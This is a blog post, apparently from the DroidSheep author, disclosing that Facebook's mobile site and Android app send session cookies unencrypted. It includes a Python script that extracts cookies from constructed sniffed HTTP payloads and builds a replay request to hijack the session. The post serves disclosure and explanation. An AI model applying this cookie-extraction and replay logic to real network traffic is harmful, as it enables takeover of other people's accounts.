In October 2010, Eric Butler released "Firesheep", an easy-to-use Firefox extension for session hijacking on Windows and Mac. It quickly caused a lot of hype and a lot of ethical discussion, even though the attack itself was neither new nor based on exploits: it only uses data that the wireless network broadcasts over the air anyway.
In January 2011, Facebook responded to the public pressure and added optional HTTPS support to its web site.
But there is one thing mobile users in particular should not forget: the HTTPS setting does not apply to m.facebook.com. There is no encryption at all for the mobile version of the Facebook web site.
Another thing is the Facebook Android app. Facebook requires every developer who wants to use the Facebook API in an application to use SSL for every request to Facebook (LINK). This is ironic: they do not use encryption for their own API traffic!
The official Facebook Android app sends its cookie and HTTP requests to Facebook unencrypted, and DroidSheep can simply hijack the requests and the account, even if the user has HTTPS enabled.
So if someone uses the mobile web site or the Android app (I don't have an iPhone, but I can imagine there is no security in the iOS Facebook app either), there is no way for them to secure their session against hijacking. This is very poor, Facebook!
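To make concrete what a passive sniffer on the same wireless network sees, here is an added example in Python (written for this post; it is not DroidSheep's code). It takes the first TCP payload of three captured connections, all constructed here: a plain-HTTP request to m.facebook.com carrying a cookie, the same kind of request over HTTPS, where only a TLS ClientHello is visible, and a plain-HTTP request without any cookie. Only the first one yields a session that can be replayed. The cookie names and the second host name are made up for the illustration.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample payloads: what a sniffer sees as the first TCP payload of
# each connection. Cookie names and example.org are assumptions, not real ones.
CAPTURED_PAYLOADS: List[bytes] = [
    # 1. Mobile web site over plain HTTP: request line, Host and Cookie are readable.
    b"GET /home.php HTTP/1.1\r\n"
    b"Host: m.facebook.com\r\n"
    b"User-Agent: Mozilla/5.0 (Linux; U; Android 2.3)\r\n"
    b"Cookie: sessionid=9%3Afake_session_token; uid=100000123\r\n"
    b"\r\n",
    # 2. The same site over HTTPS: only a TLS handshake record (type 0x16,
    #    major version 3) is visible, the cookie never appears on the wire.
    b"\x16\x03\x01\x00\x8a\x01\x00\x00\x86\x03\x01" + bytes(32),
    # 3. Plain HTTP without a cookie: readable, but nothing to hijack.
    b"GET /robots.txt HTTP/1.1\r\nHost: example.org\r\n\r\n",
]

REQUEST_LINE = re.compile(rb"^(GET|POST|HEAD|PUT|DELETE) (\S+) HTTP/1\.[01]$")


def is_tls_handshake(payload: bytes) -> bool:
    """True if the payload starts with a TLS handshake record (type 22, version 3.x)."""
    return len(payload) >= 3 and payload[0] == 0x16 and payload[1] == 0x03


def parse_plaintext_request(payload: bytes) -> Optional[Dict[str, str]]:
    """Parse an HTTP/1.x request head into a dict; return None if it is not one."""
    head, sep, _body = payload.partition(b"\r\n\r\n")
    if not sep:
        return None
    lines = head.split(b"\r\n")
    match = REQUEST_LINE.match(lines[0])
    if not match:
        return None
    request = {"method": match.group(1).decode(), "path": match.group(2).decode()}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        request[name.decode().strip().lower()] = value.decode().strip()
    return request


def parse_cookie_header(value: str) -> Dict[str, str]:
    """Split 'a=1; b=2' into a dict of cookie names to values."""
    cookies: Dict[str, str] = {}
    for part in value.split(";"):
        name, _, val = part.strip().partition("=")
        if name:
            cookies[name] = val
    return cookies


def extract_sessions(payloads: List[bytes]) -> List[Tuple[str, Dict[str, str]]]:
    """Return (host, cookies) for every plaintext request that carries a Cookie header.

    TLS connections are skipped: the cookie inside them is not visible to a sniffer.
    """
    sessions = []
    for payload in payloads:
        if is_tls_handshake(payload):
            continue
        request = parse_plaintext_request(payload)
        if request and "host" in request and "cookie" in request:
            sessions.append((request["host"], parse_cookie_header(request["cookie"])))
    return sessions


def replay_request(host: str, cookies: Dict[str, str], path: str = "/") -> bytes:
    """Build the request a hijacker sends: the victim's cookies, no password needed."""
    cookie_header = "; ".join(f"{name}={value}" for name, value in cookies.items())
    return (
        f"GET {path} HTTP/1.1\r\nHost: {host}\r\nCookie: {cookie_header}\r\n\r\n"
    ).encode()


if __name__ == "__main__":
    for host, cookies in extract_sessions(CAPTURED_PAYLOADS):
        print(f"hijackable session on {host}: {sorted(cookies)}")
        print(replay_request(host, cookies, "/home.php").decode())
```

The only payload that produces a session is the plain-HTTP one to m.facebook.com; the HTTPS connection shows nothing but handshake bytes, which is exactly the protection the HTTPS setting gives the desktop site and withholds from the mobile site and the app.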
I made a short screencast that shows this lack of security.